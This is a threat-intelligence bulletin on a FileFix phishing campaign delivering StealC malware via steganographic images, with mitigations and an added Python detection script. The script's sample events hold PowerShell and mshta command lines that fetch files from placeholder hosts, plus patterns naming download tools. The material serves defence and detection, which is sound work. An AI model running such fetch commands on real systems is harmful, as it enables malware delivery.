New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site
Summary:
Acronis’ Threat Research Unit has identified the first sophisticated in-the-wild use of FileFix, marking a notable evolution of the Fix attack family that includes ClickFix and PromptFix. While FileFix was originally presented as a proof of concept by researcher Mr. d0x in July 2025, this campaign diverges from the POC and demonstrates advanced tradecraft, including phishing infrastructure, multilanguage lures, steganography, and multistage payload delivery. Once triggered, the attack chain executes a heavily obfuscated PowerShell command that downloads AI-generated JPG images containing hidden payloads. Using steganography, the images embed both a second-stage script and encrypted executables. The second stage decrypts and extracts malicious binaries, which are executed with sandbox checks, runtime API decryption, and VM detection to evade analysis.
The final payload is a Go-based loader that deploys the StealC infostealer. StealC is capable of harvesting browser data, cryptocurrency wallets, messaging platforms, VPN credentials, and cloud authentication tokens, while also serving as a downloader for additional malware. Across observed variants, attackers have shifted infrastructure from controlled malicious domains to platforms like Bitbucket for payload hosting, increasing resilience and complicating detection. Acronis researchers observed rapid iteration of this campaign over two weeks, including payload evolution from single-stage to multi-stage scripts, changes in social engineering pretexts, and experimentation with multiple executable types. VirusTotal submissions suggest a global spread with victims across North America, Asia, Europe, and Africa.
Security Officer Comments:
The campaign highlights how quickly proof-of-concept techniques can evolve into operational attack chains, reinforcing the need for security teams to track emerging research closely. The use of steganography within FileFix attacks is particularly concerning, as it allows adversaries to embed and deliver payloads through seemingly benign images, making detection far more difficult. The reliance on multilanguage phishing lures and global infrastructure demonstrates that attackers are targeting a broad victim base, indicating scalability and organized resources behind the operation. The rapid shift from self-hosted domains to legitimate developer platforms such as Bitbucket suggests adversaries are prioritizing stealth and resilience, exploiting trusted services to bypass traditional defenses. The deployment of StealC as the final payload underscores the financial and credential-theft motives of the campaign, while its modular capabilities allow attackers to adapt quickly and expand objectives.
Suggested Corrections:
Organizations should strengthen defenses against FileFix and related Fix attacks through user education and technical controls. Users should be trained to recognize that no legitimate website should ever instruct them to paste commands into system dialogs, file upload address bars, or terminals, and phishing awareness programs should now include Fix-style techniques as a specific focus. From a technical perspective, security teams should restrict the execution of PowerShell, CMD, MSIEXEC, or MSHTA when spawned as child processes of web browsers, since this behavior is highly suspicious and unlikely to be part of normal business activity. Monitoring or blocking images downloaded via PowerShell commands can also disrupt this attack chain, as the payloads are embedded within JPG files using steganography. By enforcing these preventive measures and combining them with endpoint detection capabilities, organizations can significantly reduce the risk of FileFix-style intrusions.
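The two technical controls above (browser-spawned shells and PowerShell image downloads) as detection logic over constructed, Sysmon-style process-creation records. This is an added example, not code from the Acronis write-up; the field names, sample paths and the example.invalid URLs are assumptions.

```python
# Added example: flag the two behaviours the paragraph above recommends restricting.
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe", "mshta.exe"}
# PowerShell download primitives whose target is an image file (possible steganographic carrier).
IMAGE_FETCH = re.compile(
    r"(Invoke-WebRequest|iwr|curl|wget|DownloadFile|DownloadString|DownloadData)"
    r"[^\n]*?https?://\S+\.(?:jpe?g|png|gif)\b", re.IGNORECASE)

def parse_event(line):
    """Parse 'Key=Value' fields separated by '|' into a dict with lower-cased keys (constructed format)."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|") if "=" in kv)
    return {k.strip().lower(): v.strip() for k, v in fields.items()}

def classify(event):
    """Return detection labels for one process-creation event (empty list when clean)."""
    parent = event.get("parentimage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("commandline", "")
    labels = []
    if parent in BROWSERS and image in SUSPICIOUS_CHILDREN:
        labels.append("browser_spawned_shell")
    if image in {"powershell.exe", "pwsh.exe"} and IMAGE_FETCH.search(cmdline):
        labels.append("powershell_image_download")
    return labels

def scan(lines):
    """Map each flagged event's ProcessId to its labels; clean events are skipped."""
    hits = {}
    for line in lines:
        ev = parse_event(line)
        labels = classify(ev)
        if labels:
            hits[ev.get("processid", "?")] = labels
    return hits

# Constructed sample records (not real telemetry); hosts are placeholders.
SAMPLE_EVENTS = [
    "ProcessId=4412|ParentImage=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "CommandLine=powershell -c \"iwr https://example.invalid/img/cat.jpg -OutFile c.jpg\"",
    "ProcessId=4413|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=cmd /c dir",
    "ProcessId=4414|ParentImage=C:\\Program Files\\Mozilla Firefox\\firefox.exe|"
    "Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta https://example.invalid/x.hta",
]
```

Running `scan(SAMPLE_EVENTS)` flags 4412 on both rules and 4414 on the parent-child rule only; the explorer-spawned cmd.exe (4413) is not reported.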
Link(s):
https://thehackernews.com/2025/09/new-filefix-variant-delivers-stealc.html